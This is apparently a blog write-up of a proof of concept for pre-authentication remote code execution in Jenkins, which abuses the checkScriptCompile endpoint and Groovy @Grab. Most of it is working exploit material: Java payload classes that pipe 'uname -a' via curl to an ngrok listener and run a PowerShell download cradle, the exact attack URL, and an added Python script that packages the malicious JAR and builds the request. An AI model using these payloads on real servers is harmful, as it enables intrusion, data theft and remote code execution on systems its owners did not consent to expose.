Jenkins RCE PoC, or simple pre-auth remote code execution on the server.

Valeriy Shevchenko
Aug 19 · 4 min read
http://example.com/jenkins/securityRealm/user/admin/
Jenkins User Id: admin
// Orange.java: the constructor is the payload. Groovy instantiates this class as a
// "Runner" right after the grab, so the command executes while the script is compiled.
public class Orange {
    public Orange() {
        try {
            // Exfiltrate `uname -a` to the attacker's listener as an HTTP POST body.
            String payload = "uname -a | curl -d @- http://myservertunnel.ngrok.io/";
            String[] cmds = {"/bin/bash", "-c", payload};
            java.lang.Runtime.getRuntime().exec(cmds);
        } catch (Exception e) { }
    }
}
uname -a | curl -d @- http://myservertunnel.ngrok.io/
javac -target 1.8 Orange.java
./Orange.java
./Orange.class
./META-INF
./META-INF/services
./META-INF/services/org.codehaus.groovy.plugins.Runners
Just a screenshot of all the required steps to build your PoC (without -target 1.8):
The whole four-line Groovy script goes into the value parameter (URL-encode it when sending; the newlines become %0A). The @Grab annotations are processed at compile time, so the JAR is fetched and Orange is instantiated even though the script is never "run":

http://example.com/jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)
@GrabResolver(name='orange.tw', root='http://myservertunnel.ngrok.io/')
@Grab(group='tw.orange', module='poc', version='1')
import Orange;
Response. The endpoint only reports that the script compiled; the evidence of execution is the uname -a output arriving at your listener:

{
    "column": 0,
    "line": 0,
    "message": "",
    "status": "success"
}
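The steps above leave two pieces to the reader: how the served files must be laid out so that @Grab actually finds poc-1.jar, and how the multi-line script is packed into the checkScriptCompile query string. The following Python is an added example (not the author's code) that builds both. It assumes that Grape resolves the coordinates against a Maven-layout repository, i.e. that it requests <root>/tw/orange/poc/1/poc-1.pom and poc-1.jar under the @GrabResolver root; the class bytes used in the demo are a constructed placeholder standing in for a real Orange.class compiled with `javac -target 1.8` (the target matters because the Jenkins JVM has to be able to load the class file version).

```python
"""Package the Grab-able artifact and the checkScriptCompile request used
in this write-up. Added example, not the author's code.

Assumption: Grape resolves @Grab coordinates against a Maven-layout
repository, so group 'tw.orange', module 'poc', version '1' is fetched
from <root>/tw/orange/poc/1/poc-1.pom and poc-1.jar. The class bytes in
the demo are a constructed placeholder, not a compiled Orange.class.
"""
import io
import tempfile
import zipfile
from pathlib import Path
from urllib.parse import urlencode

# Groovy instantiates every class listed in this service file right after a
# grab; that is what turns "compile this script" into "run new Orange()".
RUNNERS_SERVICE = "META-INF/services/org.codehaus.groovy.plugins.Runners"

CHECK_SCRIPT_COMPILE = (
    "/securityRealm/user/admin/descriptorByName/"
    "org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"
)


def artifact_paths(group, module, version):
    """Relative repository paths the resolver requests for these
    coordinates (Maven layout: dots in the group become directories)."""
    base = f"{group.replace('.', '/')}/{module}/{version}/{module}-{version}"
    return {"pom": base + ".pom", "jar": base + ".jar"}


def minimal_pom(group, module, version):
    """Smallest POM that lets the resolver accept the JAR next to it."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<project xmlns="http://maven.apache.org/POM/4.0.0">\n'
        "  <modelVersion>4.0.0</modelVersion>\n"
        f"  <groupId>{group}</groupId>\n"
        f"  <artifactId>{module}</artifactId>\n"
        f"  <version>{version}</version>\n"
        "  <packaging>jar</packaging>\n"
        "</project>\n"
    )


def build_jar(class_name, class_bytes):
    """Return JAR bytes holding the class file plus the Runners service
    entry that names it. A JAR is a plain zip, so no JDK tooling is needed."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{class_name}.class", class_bytes)
        zf.writestr(RUNNERS_SERVICE, class_name + "\n")
    return buf.getvalue()


def jar_entries(jar_bytes):
    """Map of entry name -> bytes, for inspecting a built JAR."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def write_repo(root, group, module, version, class_name, class_bytes):
    """Lay the POM and JAR out under `root` so any static web server rooted
    there can serve as the @GrabResolver. Returns the relative files written."""
    written = []
    for kind, rel in artifact_paths(group, module, version).items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        if kind == "pom":
            target.write_text(minimal_pom(group, module, version))
        else:
            target.write_bytes(build_jar(class_name, class_bytes))
        written.append(rel)
    return written


def grab_script(resolver_url, group, module, version, class_name):
    """The Groovy that checkScriptCompile compiles. disableChecksums spares
    us from also serving a .sha1 file beside each artifact."""
    return "\n".join([
        "@GrabConfig(disableChecksums=true)",
        f"@GrabResolver(name='orange.tw', root='{resolver_url}')",
        f"@Grab(group='{group}', module='{module}', version='{version}')",
        f"import {class_name};",
    ])


def check_script_compile_url(jenkins_base, script):
    """Full GET URL; percent-encoding keeps the script's newlines intact."""
    return jenkins_base.rstrip("/") + CHECK_SCRIPT_COMPILE + "?" + urlencode({"value": script})


if __name__ == "__main__":
    # Constructed placeholder bytes; a real run uses the Orange.class produced
    # by `javac -target 1.8 Orange.java` so the Jenkins JVM can load it.
    fake_class = b"\xca\xfe\xba\xbe" + b"\x00" * 4
    with tempfile.TemporaryDirectory() as root:
        print(write_repo(root, "tw.orange", "poc", "1", "Orange", fake_class))
    script = grab_script("http://myservertunnel.ngrok.io/", "tw.orange", "poc", "1", "Orange")
    print(check_script_compile_url("http://example.com/jenkins", script))
```

Serve the directory written by write_repo() from the host named in @GrabResolver and send the URL produced by check_script_compile_url(); the JSON "success" response only tells you the script compiled, so watch the listener for the callback.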
// Windows variant of Orange.java: same Runner trick, but the constructor starts a
// PowerShell download cradle instead of a bash pipeline.
public class Orange {
    public Orange() {
        try {
            // Fetch and execute a PowerShell script from the attacker's server.
            String payload = "powershell iex(new-object net.webclient).downloadstring('http://yourserver.com/shell.ps1')";
            String[] cmds = {"cmd", "/c", payload};
            java.lang.Runtime.getRuntime().exec(cmds);
        } catch (Exception e) { }
    }
}
